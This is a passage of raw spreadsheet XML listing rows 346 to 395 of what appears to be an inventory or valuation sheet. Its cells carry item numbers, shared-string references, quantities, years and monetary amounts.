        <v>340</v>
      </c>
      <c r="C346" s="237" t="s">
        <v>3633</v>
      </c>
      <c r="D346" s="238" t="s">
        <v>3634</v>
      </c>
      <c r="E346" s="238" t="s">
        <v>3635</v>
      </c>
      <c r="F346" s="9"/>
      <c r="G346" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H346" s="11">
        <v>1</v>
      </c>
      <c r="I346" s="238" t="s">
        <v>3636</v>
      </c>
      <c r="J346" s="126">
        <v>8547.01</v>
      </c>
      <c r="K346" s="99">
        <v>3552.64</v>
      </c>
      <c r="L346" s="238" t="s">
        <v>3637</v>
      </c>
    </row>
    <row r="347" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A347" s="93"/>
      <c r="B347" s="88">
        <v>341</v>
      </c>
      <c r="C347" s="237" t="s">
        <v>3638</v>
      </c>
      <c r="D347" s="238" t="s">
        <v>3639</v>
      </c>
      <c r="E347" s="238" t="s">
        <v>1276</v>
      </c>
      <c r="F347" s="9"/>
      <c r="G347" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H347" s="11">
        <v>1</v>
      </c>
      <c r="I347" s="238" t="s">
        <v>3640</v>
      </c>
      <c r="J347" s="126">
        <v>20085.47</v>
      </c>
      <c r="K347" s="99">
        <v>9760</v>
      </c>
      <c r="L347" s="238" t="s">
        <v>3641</v>
      </c>
    </row>
    <row r="348" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A348" s="93"/>
      <c r="B348" s="88">
        <v>342</v>
      </c>
      <c r="C348" s="237" t="s">
        <v>3642</v>
      </c>
      <c r="D348" s="238" t="s">
        <v>3643</v>
      </c>
      <c r="E348" s="238" t="s">
        <v>3644</v>
      </c>
      <c r="F348" s="9"/>
      <c r="G348" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H348" s="11">
        <v>1</v>
      </c>
      <c r="I348" s="238" t="s">
        <v>3640</v>
      </c>
      <c r="J348" s="126">
        <v>384615.38</v>
      </c>
      <c r="K348" s="99">
        <v>187684.8</v>
      </c>
      <c r="L348" s="238" t="s">
        <v>3645</v>
      </c>
    </row>
    <row r="349" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A349" s="93"/>
      <c r="B349" s="88">
        <v>343</v>
      </c>
      <c r="C349" s="237" t="s">
        <v>3646</v>
      </c>
      <c r="D349" s="238" t="s">
        <v>3647</v>
      </c>
      <c r="E349" s="238" t="s">
        <v>3648</v>
      </c>
      <c r="F349" s="9"/>
      <c r="G349" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H349" s="11">
        <v>1</v>
      </c>
      <c r="I349" s="238" t="s">
        <v>3640</v>
      </c>
      <c r="J349" s="126">
        <v>14102.56</v>
      </c>
      <c r="K349" s="99">
        <v>6880.8</v>
      </c>
      <c r="L349" s="238" t="s">
        <v>3649</v>
      </c>
    </row>
    <row r="350" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A350" s="93"/>
      <c r="B350" s="88">
        <v>344</v>
      </c>
      <c r="C350" s="237" t="s">
        <v>3650</v>
      </c>
      <c r="D350" s="238" t="s">
        <v>3651</v>
      </c>
      <c r="E350" s="10"/>
      <c r="F350" s="9"/>
      <c r="G350" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H350" s="11">
        <v>2</v>
      </c>
      <c r="I350" s="238" t="s">
        <v>2717</v>
      </c>
      <c r="J350" s="126">
        <v>55555.56</v>
      </c>
      <c r="K350" s="99">
        <v>26640</v>
      </c>
      <c r="L350" s="238" t="s">
        <v>3652</v>
      </c>
    </row>
    <row r="351" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A351" s="93"/>
      <c r="B351" s="88">
        <v>345</v>
      </c>
      <c r="C351" s="237" t="s">
        <v>3653</v>
      </c>
      <c r="D351" s="238" t="s">
        <v>2752</v>
      </c>
      <c r="E351" s="238" t="s">
        <v>3654</v>
      </c>
      <c r="F351" s="9"/>
      <c r="G351" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H351" s="11">
        <v>1</v>
      </c>
      <c r="I351" s="238" t="s">
        <v>3655</v>
      </c>
      <c r="J351" s="126">
        <v>289743.58</v>
      </c>
      <c r="K351" s="99">
        <v>139056</v>
      </c>
      <c r="L351" s="238" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="352" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A352" s="93"/>
      <c r="B352" s="88">
        <v>346</v>
      </c>
      <c r="C352" s="237" t="s">
        <v>3657</v>
      </c>
      <c r="D352" s="238" t="s">
        <v>2923</v>
      </c>
      <c r="E352" s="238" t="s">
        <v>3658</v>
      </c>
      <c r="F352" s="9"/>
      <c r="G352" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H352" s="11">
        <v>1</v>
      </c>
      <c r="I352" s="238" t="s">
        <v>3655</v>
      </c>
      <c r="J352" s="126">
        <v>83760.68</v>
      </c>
      <c r="K352" s="99">
        <v>40176</v>
      </c>
      <c r="L352" s="238" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="353" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A353" s="93"/>
      <c r="B353" s="88">
        <v>347</v>
      </c>
      <c r="C353" s="237" t="s">
        <v>3659</v>
      </c>
      <c r="D353" s="238" t="s">
        <v>3660</v>
      </c>
      <c r="E353" s="238" t="s">
        <v>3661</v>
      </c>
      <c r="F353" s="9"/>
      <c r="G353" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H353" s="11">
        <v>1</v>
      </c>
      <c r="I353" s="238" t="s">
        <v>3655</v>
      </c>
      <c r="J353" s="126">
        <v>26923.08</v>
      </c>
      <c r="K353" s="99">
        <v>12912</v>
      </c>
      <c r="L353" s="238" t="s">
        <v>3595</v>
      </c>
    </row>
    <row r="354" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A354" s="93"/>
      <c r="B354" s="88">
        <v>348</v>
      </c>
      <c r="C354" s="237" t="s">
        <v>3662</v>
      </c>
      <c r="D354" s="238" t="s">
        <v>3660</v>
      </c>
      <c r="E354" s="238" t="s">
        <v>3663</v>
      </c>
      <c r="F354" s="9"/>
      <c r="G354" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H354" s="11">
        <v>1</v>
      </c>
      <c r="I354" s="238" t="s">
        <v>3655</v>
      </c>
      <c r="J354" s="126">
        <v>11111.11</v>
      </c>
      <c r="K354" s="99">
        <v>5328</v>
      </c>
      <c r="L354" s="238" t="s">
        <v>3595</v>
      </c>
    </row>
    <row r="355" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A355" s="93"/>
      <c r="B355" s="88">
        <v>349</v>
      </c>
      <c r="C355" s="237" t="s">
        <v>3664</v>
      </c>
      <c r="D355" s="238" t="s">
        <v>3665</v>
      </c>
      <c r="E355" s="238" t="s">
        <v>3666</v>
      </c>
      <c r="F355" s="9"/>
      <c r="G355" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H355" s="11">
        <v>1</v>
      </c>
      <c r="I355" s="238" t="s">
        <v>3667</v>
      </c>
      <c r="J355" s="126">
        <v>4529.91</v>
      </c>
      <c r="K355" s="99">
        <v>1880.32</v>
      </c>
      <c r="L355" s="238" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="356" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A356" s="93"/>
      <c r="B356" s="88">
        <v>350</v>
      </c>
      <c r="C356" s="237" t="s">
        <v>3669</v>
      </c>
      <c r="D356" s="238" t="s">
        <v>3660</v>
      </c>
      <c r="E356" s="238" t="s">
        <v>3670</v>
      </c>
      <c r="F356" s="9"/>
      <c r="G356" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H356" s="11">
        <v>1</v>
      </c>
      <c r="I356" s="238" t="s">
        <v>3667</v>
      </c>
      <c r="J356" s="126">
        <v>26923.08</v>
      </c>
      <c r="K356" s="99">
        <v>12912</v>
      </c>
      <c r="L356" s="238" t="s">
        <v>3671</v>
      </c>
    </row>
    <row r="357" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A357" s="93"/>
      <c r="B357" s="88">
        <v>351</v>
      </c>
      <c r="C357" s="237" t="s">
        <v>3672</v>
      </c>
      <c r="D357" s="238" t="s">
        <v>3673</v>
      </c>
      <c r="E357" s="238" t="s">
        <v>3674</v>
      </c>
      <c r="F357" s="9"/>
      <c r="G357" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H357" s="11">
        <v>1</v>
      </c>
      <c r="I357" s="238" t="s">
        <v>462</v>
      </c>
      <c r="J357" s="126">
        <v>10256.41</v>
      </c>
      <c r="K357" s="99">
        <v>4896</v>
      </c>
      <c r="L357" s="238" t="s">
        <v>3675</v>
      </c>
    </row>
    <row r="358" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A358" s="93"/>
      <c r="B358" s="88">
        <v>352</v>
      </c>
      <c r="C358" s="237" t="s">
        <v>3676</v>
      </c>
      <c r="D358" s="238" t="s">
        <v>3677</v>
      </c>
      <c r="E358" s="10"/>
      <c r="F358" s="9"/>
      <c r="G358" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H358" s="11">
        <v>3</v>
      </c>
      <c r="I358" s="238" t="s">
        <v>483</v>
      </c>
      <c r="J358" s="126">
        <v>17948.72</v>
      </c>
      <c r="K358" s="99">
        <v>9021.6</v>
      </c>
      <c r="L358" s="238" t="s">
        <v>3678</v>
      </c>
    </row>
    <row r="359" customHeight="1" spans="1:12">
      <c r="A359" s="93"/>
      <c r="B359" s="127" t="s">
        <v>3679</v>
      </c>
      <c r="C359" s="128"/>
      <c r="D359" s="129"/>
      <c r="H359" s="16"/>
      <c r="K359" s="99">
        <v>0</v>
      </c>
      <c r="L359" s="9"/>
    </row>
    <row r="360" customHeight="1" spans="1:12">
      <c r="A360" s="93"/>
      <c r="B360" s="11">
        <v>353</v>
      </c>
      <c r="C360" s="11"/>
      <c r="D360" s="9" t="s">
        <v>331</v>
      </c>
      <c r="E360" s="9" t="s">
        <v>3680</v>
      </c>
      <c r="F360" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G360" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H360" s="16">
        <v>1</v>
      </c>
      <c r="I360" s="88">
        <v>2006</v>
      </c>
      <c r="K360" s="99">
        <v>6240</v>
      </c>
      <c r="L360" s="9"/>
    </row>
    <row r="361" customHeight="1" spans="1:12">
      <c r="A361" s="93"/>
      <c r="B361" s="11">
        <v>354</v>
      </c>
      <c r="C361" s="11"/>
      <c r="D361" s="9" t="s">
        <v>3681</v>
      </c>
      <c r="E361" s="9" t="s">
        <v>3682</v>
      </c>
      <c r="G361" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H361" s="16">
        <v>2</v>
      </c>
      <c r="K361" s="99">
        <v>2400</v>
      </c>
      <c r="L361" s="9"/>
    </row>
    <row r="362" customHeight="1" spans="1:12">
      <c r="A362" s="93"/>
      <c r="B362" s="11">
        <v>355</v>
      </c>
      <c r="C362" s="11"/>
      <c r="D362" s="10" t="s">
        <v>3683</v>
      </c>
      <c r="E362" s="9" t="s">
        <v>3684</v>
      </c>
      <c r="G362" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H362" s="88">
        <v>1</v>
      </c>
      <c r="I362" s="10"/>
      <c r="J362" s="130"/>
      <c r="K362" s="99">
        <v>800</v>
      </c>
      <c r="L362" s="9"/>
    </row>
    <row r="363" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A363" s="93"/>
      <c r="B363" s="11">
        <v>356</v>
      </c>
      <c r="C363" s="11"/>
      <c r="D363" s="9" t="s">
        <v>3685</v>
      </c>
      <c r="E363" s="9" t="s">
        <v>3686</v>
      </c>
      <c r="F363" s="9"/>
      <c r="G363" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H363" s="16">
        <v>1</v>
      </c>
      <c r="I363" s="9"/>
      <c r="J363" s="131"/>
      <c r="K363" s="99">
        <v>4000</v>
      </c>
      <c r="L363" s="9"/>
    </row>
    <row r="364" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A364" s="93"/>
      <c r="B364" s="11">
        <v>357</v>
      </c>
      <c r="C364" s="11"/>
      <c r="D364" s="9" t="s">
        <v>2892</v>
      </c>
      <c r="E364" s="9" t="s">
        <v>3687</v>
      </c>
      <c r="F364" s="9"/>
      <c r="G364" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H364" s="16">
        <v>1</v>
      </c>
      <c r="I364" s="9"/>
      <c r="J364" s="131"/>
      <c r="K364" s="99">
        <v>4800</v>
      </c>
      <c r="L364" s="9"/>
    </row>
    <row r="365" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A365" s="93"/>
      <c r="B365" s="11">
        <v>358</v>
      </c>
      <c r="C365" s="11"/>
      <c r="D365" s="9" t="s">
        <v>3155</v>
      </c>
      <c r="E365" s="9" t="s">
        <v>3688</v>
      </c>
      <c r="F365" s="9"/>
      <c r="G365" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H365" s="16">
        <v>1</v>
      </c>
      <c r="I365" s="9"/>
      <c r="J365" s="131"/>
      <c r="K365" s="99">
        <v>800</v>
      </c>
      <c r="L365" s="9"/>
    </row>
    <row r="366" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A366" s="93"/>
      <c r="B366" s="11">
        <v>359</v>
      </c>
      <c r="C366" s="11"/>
      <c r="D366" s="9" t="s">
        <v>3155</v>
      </c>
      <c r="E366" s="9" t="s">
        <v>3689</v>
      </c>
      <c r="F366" s="9"/>
      <c r="G366" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H366" s="16">
        <v>1</v>
      </c>
      <c r="I366" s="9"/>
      <c r="J366" s="9"/>
      <c r="K366" s="99">
        <v>400</v>
      </c>
      <c r="L366" s="9"/>
    </row>
    <row r="367" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A367" s="93"/>
      <c r="B367" s="127" t="s">
        <v>3690</v>
      </c>
      <c r="C367" s="128"/>
      <c r="D367" s="129"/>
      <c r="E367" s="9"/>
      <c r="F367" s="9"/>
      <c r="G367" s="16"/>
      <c r="H367" s="16"/>
      <c r="I367" s="9"/>
      <c r="J367" s="9"/>
      <c r="K367" s="99">
        <v>0</v>
      </c>
      <c r="L367" s="9"/>
    </row>
    <row r="368" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A368" s="93"/>
      <c r="B368" s="11">
        <v>360</v>
      </c>
      <c r="C368" s="11"/>
      <c r="D368" s="10" t="s">
        <v>3691</v>
      </c>
      <c r="E368" s="10" t="s">
        <v>3692</v>
      </c>
      <c r="F368" s="9"/>
      <c r="G368" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H368" s="16">
        <v>1</v>
      </c>
      <c r="I368" s="9"/>
      <c r="J368" s="9"/>
      <c r="K368" s="99">
        <v>1200</v>
      </c>
      <c r="L368" s="9"/>
    </row>
    <row r="369" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A369" s="93"/>
      <c r="B369" s="11">
        <v>361</v>
      </c>
      <c r="C369" s="11"/>
      <c r="D369" s="9" t="s">
        <v>3693</v>
      </c>
      <c r="E369" s="9" t="s">
        <v>3694</v>
      </c>
      <c r="F369" s="9"/>
      <c r="G369" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H369" s="16">
        <v>1</v>
      </c>
      <c r="I369" s="9"/>
      <c r="J369" s="9"/>
      <c r="K369" s="99">
        <v>400</v>
      </c>
      <c r="L369" s="9"/>
    </row>
    <row r="370" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A370" s="93"/>
      <c r="B370" s="127" t="s">
        <v>1432</v>
      </c>
      <c r="C370" s="128"/>
      <c r="D370" s="129"/>
      <c r="E370" s="9"/>
      <c r="F370" s="9"/>
      <c r="G370" s="16"/>
      <c r="H370" s="16"/>
      <c r="I370" s="9"/>
      <c r="J370" s="9"/>
      <c r="K370" s="99">
        <v>0</v>
      </c>
      <c r="L370" s="9"/>
    </row>
    <row r="371" customHeight="1" spans="1:12">
      <c r="A371" s="93"/>
      <c r="B371" s="11">
        <v>362</v>
      </c>
      <c r="C371" s="11"/>
      <c r="D371" s="9" t="s">
        <v>3683</v>
      </c>
      <c r="E371" s="9" t="s">
        <v>3695</v>
      </c>
      <c r="F371" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G371" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H371" s="16">
        <v>1</v>
      </c>
      <c r="I371" s="88">
        <v>2005</v>
      </c>
      <c r="K371" s="99">
        <v>1344</v>
      </c>
      <c r="L371" s="9"/>
    </row>
    <row r="372" customHeight="1" spans="1:12">
      <c r="A372" s="93"/>
      <c r="B372" s="11">
        <v>363</v>
      </c>
      <c r="C372" s="11"/>
      <c r="D372" s="9" t="s">
        <v>3432</v>
      </c>
      <c r="E372" s="9" t="s">
        <v>3696</v>
      </c>
      <c r="F372" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G372" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H372" s="16">
        <v>2</v>
      </c>
      <c r="I372" s="88">
        <v>2006</v>
      </c>
      <c r="K372" s="99">
        <v>320</v>
      </c>
      <c r="L372" s="9"/>
    </row>
    <row r="373" customHeight="1" spans="1:12">
      <c r="A373" s="93"/>
      <c r="B373" s="11">
        <v>364</v>
      </c>
      <c r="C373" s="11"/>
      <c r="D373" s="9" t="s">
        <v>3697</v>
      </c>
      <c r="G373" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H373" s="16">
        <v>1</v>
      </c>
      <c r="I373" s="88"/>
      <c r="K373" s="99">
        <v>120</v>
      </c>
      <c r="L373" s="9"/>
    </row>
    <row r="374" customHeight="1" spans="1:12">
      <c r="A374" s="93"/>
      <c r="B374" s="11">
        <v>365</v>
      </c>
      <c r="C374" s="11"/>
      <c r="D374" s="9" t="s">
        <v>3698</v>
      </c>
      <c r="E374" s="9" t="s">
        <v>3699</v>
      </c>
      <c r="G374" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H374" s="16">
        <v>1</v>
      </c>
      <c r="I374" s="88"/>
      <c r="K374" s="99">
        <v>1200</v>
      </c>
      <c r="L374" s="9"/>
    </row>
    <row r="375" customHeight="1" spans="1:12">
      <c r="A375" s="93"/>
      <c r="B375" s="11">
        <v>366</v>
      </c>
      <c r="C375" s="11"/>
      <c r="D375" s="10" t="s">
        <v>3700</v>
      </c>
      <c r="E375" s="10" t="s">
        <v>3701</v>
      </c>
      <c r="G375" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H375" s="88">
        <v>1</v>
      </c>
      <c r="I375" s="88"/>
      <c r="J375" s="130"/>
      <c r="K375" s="99">
        <v>800</v>
      </c>
      <c r="L375" s="9"/>
    </row>
    <row r="376" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A376" s="93"/>
      <c r="B376" s="11">
        <v>367</v>
      </c>
      <c r="C376" s="11"/>
      <c r="D376" s="9" t="s">
        <v>3702</v>
      </c>
      <c r="E376" s="9" t="s">
        <v>3703</v>
      </c>
      <c r="F376" s="9"/>
      <c r="G376" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H376" s="16">
        <v>1</v>
      </c>
      <c r="J376" s="131"/>
      <c r="K376" s="99">
        <v>120</v>
      </c>
      <c r="L376" s="9"/>
    </row>
    <row r="377" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A377" s="93"/>
      <c r="B377" s="11">
        <v>368</v>
      </c>
      <c r="C377" s="11"/>
      <c r="D377" s="9" t="s">
        <v>3704</v>
      </c>
      <c r="E377" s="9" t="s">
        <v>3705</v>
      </c>
      <c r="F377" s="9"/>
      <c r="G377" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H377" s="16">
        <v>1</v>
      </c>
      <c r="J377" s="131"/>
      <c r="K377" s="99">
        <v>40</v>
      </c>
      <c r="L377" s="9"/>
    </row>
    <row r="378" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A378" s="93"/>
      <c r="B378" s="127" t="s">
        <v>3706</v>
      </c>
      <c r="C378" s="128"/>
      <c r="D378" s="129"/>
      <c r="E378" s="9"/>
      <c r="F378" s="9"/>
      <c r="G378" s="16"/>
      <c r="H378" s="16"/>
      <c r="J378" s="131"/>
      <c r="K378" s="99">
        <v>0</v>
      </c>
      <c r="L378" s="9"/>
    </row>
    <row r="379" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A379" s="93"/>
      <c r="B379" s="11">
        <v>369</v>
      </c>
      <c r="C379" s="11"/>
      <c r="D379" s="9" t="s">
        <v>3011</v>
      </c>
      <c r="E379" s="9" t="s">
        <v>3707</v>
      </c>
      <c r="F379" s="9"/>
      <c r="G379" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H379" s="16">
        <v>3</v>
      </c>
      <c r="I379" s="88">
        <v>2011</v>
      </c>
      <c r="J379" s="9"/>
      <c r="K379" s="99">
        <v>384</v>
      </c>
      <c r="L379" s="9"/>
    </row>
    <row r="380" customHeight="1" spans="1:12">
      <c r="A380" s="93"/>
      <c r="B380" s="127" t="s">
        <v>1897</v>
      </c>
      <c r="C380" s="128"/>
      <c r="D380" s="129"/>
      <c r="H380" s="16"/>
      <c r="I380" s="88"/>
      <c r="K380" s="99">
        <v>0</v>
      </c>
      <c r="L380" s="9"/>
    </row>
    <row r="381" customHeight="1" spans="1:12">
      <c r="A381" s="93"/>
      <c r="B381" s="11">
        <v>370</v>
      </c>
      <c r="C381" s="11"/>
      <c r="D381" s="10" t="s">
        <v>3708</v>
      </c>
      <c r="E381" s="10" t="s">
        <v>3709</v>
      </c>
      <c r="F381" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G381" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H381" s="88">
        <v>2</v>
      </c>
      <c r="I381" s="88"/>
      <c r="J381" s="130"/>
      <c r="K381" s="99">
        <v>32000</v>
      </c>
      <c r="L381" s="9"/>
    </row>
    <row r="382" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A382" s="93"/>
      <c r="B382" s="11">
        <v>371</v>
      </c>
      <c r="C382" s="11"/>
      <c r="D382" s="9" t="s">
        <v>3710</v>
      </c>
      <c r="E382" s="9" t="s">
        <v>3711</v>
      </c>
      <c r="F382" s="9"/>
      <c r="G382" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H382" s="16">
        <v>2</v>
      </c>
      <c r="J382" s="131"/>
      <c r="K382" s="99">
        <v>12800</v>
      </c>
      <c r="L382" s="9"/>
    </row>
    <row r="383" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A383" s="93"/>
      <c r="B383" s="11">
        <v>372</v>
      </c>
      <c r="C383" s="11"/>
      <c r="D383" s="9" t="s">
        <v>3712</v>
      </c>
      <c r="E383" s="9" t="s">
        <v>3713</v>
      </c>
      <c r="F383" s="9"/>
      <c r="G383" s="16" t="s">
        <v>1315</v>
      </c>
      <c r="H383" s="16">
        <v>1</v>
      </c>
      <c r="J383" s="131"/>
      <c r="K383" s="99">
        <v>41600</v>
      </c>
      <c r="L383" s="9"/>
    </row>
    <row r="384" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A384" s="93"/>
      <c r="B384" s="11">
        <v>373</v>
      </c>
      <c r="C384" s="11"/>
      <c r="D384" s="9" t="s">
        <v>3714</v>
      </c>
      <c r="E384" s="9" t="s">
        <v>3715</v>
      </c>
      <c r="F384" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G384" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H384" s="16">
        <v>1</v>
      </c>
      <c r="I384" s="88">
        <v>2003</v>
      </c>
      <c r="J384" s="131"/>
      <c r="K384" s="99">
        <v>80</v>
      </c>
      <c r="L384" s="9"/>
    </row>
    <row r="385" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A385" s="93"/>
      <c r="B385" s="11">
        <v>374</v>
      </c>
      <c r="C385" s="11"/>
      <c r="D385" s="9" t="s">
        <v>3716</v>
      </c>
      <c r="E385" s="9" t="s">
        <v>3717</v>
      </c>
      <c r="F385" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G385" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H385" s="16">
        <v>2</v>
      </c>
      <c r="I385" s="88">
        <v>2013</v>
      </c>
      <c r="J385" s="9"/>
      <c r="K385" s="99">
        <v>1176</v>
      </c>
      <c r="L385" s="9"/>
    </row>
    <row r="386" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A386" s="93"/>
      <c r="B386" s="11">
        <v>375</v>
      </c>
      <c r="C386" s="11"/>
      <c r="D386" s="9" t="s">
        <v>3718</v>
      </c>
      <c r="E386" s="9" t="s">
        <v>3719</v>
      </c>
      <c r="F386" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G386" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H386" s="16">
        <v>1</v>
      </c>
      <c r="I386" s="88">
        <v>2007</v>
      </c>
      <c r="J386" s="9"/>
      <c r="K386" s="99">
        <v>56</v>
      </c>
      <c r="L386" s="9"/>
    </row>
    <row r="387" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A387" s="93"/>
      <c r="B387" s="11">
        <v>376</v>
      </c>
      <c r="C387" s="11"/>
      <c r="D387" s="9" t="s">
        <v>3708</v>
      </c>
      <c r="E387" s="9" t="s">
        <v>3720</v>
      </c>
      <c r="F387" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G387" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H387" s="16">
        <v>1</v>
      </c>
      <c r="J387" s="9"/>
      <c r="K387" s="99">
        <v>6400</v>
      </c>
      <c r="L387" s="9"/>
    </row>
    <row r="388" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A388" s="93"/>
      <c r="B388" s="11">
        <v>377</v>
      </c>
      <c r="C388" s="11"/>
      <c r="D388" s="9" t="s">
        <v>3721</v>
      </c>
      <c r="E388" s="9" t="s">
        <v>3722</v>
      </c>
      <c r="F388" s="9"/>
      <c r="G388" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H388" s="16">
        <v>1</v>
      </c>
      <c r="J388" s="9"/>
      <c r="K388" s="99">
        <v>1792</v>
      </c>
      <c r="L388" s="9"/>
    </row>
    <row r="389" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A389" s="93"/>
      <c r="B389" s="127" t="s">
        <v>3723</v>
      </c>
      <c r="C389" s="128"/>
      <c r="D389" s="129"/>
      <c r="E389" s="9"/>
      <c r="F389" s="9"/>
      <c r="G389" s="16"/>
      <c r="H389" s="16"/>
      <c r="J389" s="9"/>
      <c r="K389" s="99">
        <v>0</v>
      </c>
      <c r="L389" s="9"/>
    </row>
    <row r="390" customHeight="1" spans="1:12">
      <c r="A390" s="93"/>
      <c r="B390" s="11">
        <v>378</v>
      </c>
      <c r="C390" s="11"/>
      <c r="D390" s="10" t="s">
        <v>3724</v>
      </c>
      <c r="E390" s="10" t="s">
        <v>3725</v>
      </c>
      <c r="F390" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G390" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H390" s="16">
        <v>1</v>
      </c>
      <c r="I390" s="88">
        <v>2003</v>
      </c>
      <c r="K390" s="99">
        <v>208</v>
      </c>
      <c r="L390" s="9"/>
    </row>
    <row r="391" customHeight="1" spans="1:12">
      <c r="A391" s="93"/>
      <c r="B391" s="11">
        <v>379</v>
      </c>
      <c r="C391" s="11"/>
      <c r="D391" s="9" t="s">
        <v>1426</v>
      </c>
      <c r="E391" s="9" t="s">
        <v>3726</v>
      </c>
      <c r="G391" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H391" s="16">
        <v>1</v>
      </c>
      <c r="I391" s="88"/>
      <c r="K391" s="99">
        <v>420</v>
      </c>
      <c r="L391" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="392" customHeight="1" spans="1:12">
      <c r="A392" s="93"/>
      <c r="B392" s="11">
        <v>380</v>
      </c>
      <c r="C392" s="11"/>
      <c r="D392" s="9" t="s">
        <v>3710</v>
      </c>
      <c r="E392" s="9" t="s">
        <v>3728</v>
      </c>
      <c r="G392" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H392" s="16">
        <v>2</v>
      </c>
      <c r="I392" s="88">
        <v>1991</v>
      </c>
      <c r="K392" s="99">
        <v>200</v>
      </c>
      <c r="L392" s="9"/>
    </row>
    <row r="393" customHeight="1" spans="1:12">
      <c r="A393" s="93"/>
      <c r="B393" s="11">
        <v>381</v>
      </c>
      <c r="C393" s="11"/>
      <c r="D393" s="9" t="s">
        <v>3729</v>
      </c>
      <c r="E393" s="9" t="s">
        <v>3730</v>
      </c>
      <c r="F393" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G393" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H393" s="16">
        <v>1</v>
      </c>
      <c r="I393" s="88"/>
      <c r="K393" s="99">
        <v>360</v>
      </c>
      <c r="L393" s="9"/>
    </row>
    <row r="394" customHeight="1" spans="1:12">
      <c r="A394" s="93"/>
      <c r="B394" s="11">
        <v>382</v>
      </c>
      <c r="C394" s="11"/>
      <c r="D394" s="10" t="s">
        <v>3731</v>
      </c>
      <c r="E394" s="10" t="s">
        <v>3732</v>
      </c>
      <c r="F394" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G394" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H394" s="88">
        <v>2</v>
      </c>
      <c r="I394" s="88">
        <v>2007</v>
      </c>
      <c r="J394" s="130"/>
      <c r="K394" s="99">
        <v>160</v>
      </c>
      <c r="L394" s="9"/>
    </row>
    <row r="395" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A395" s="93"/>
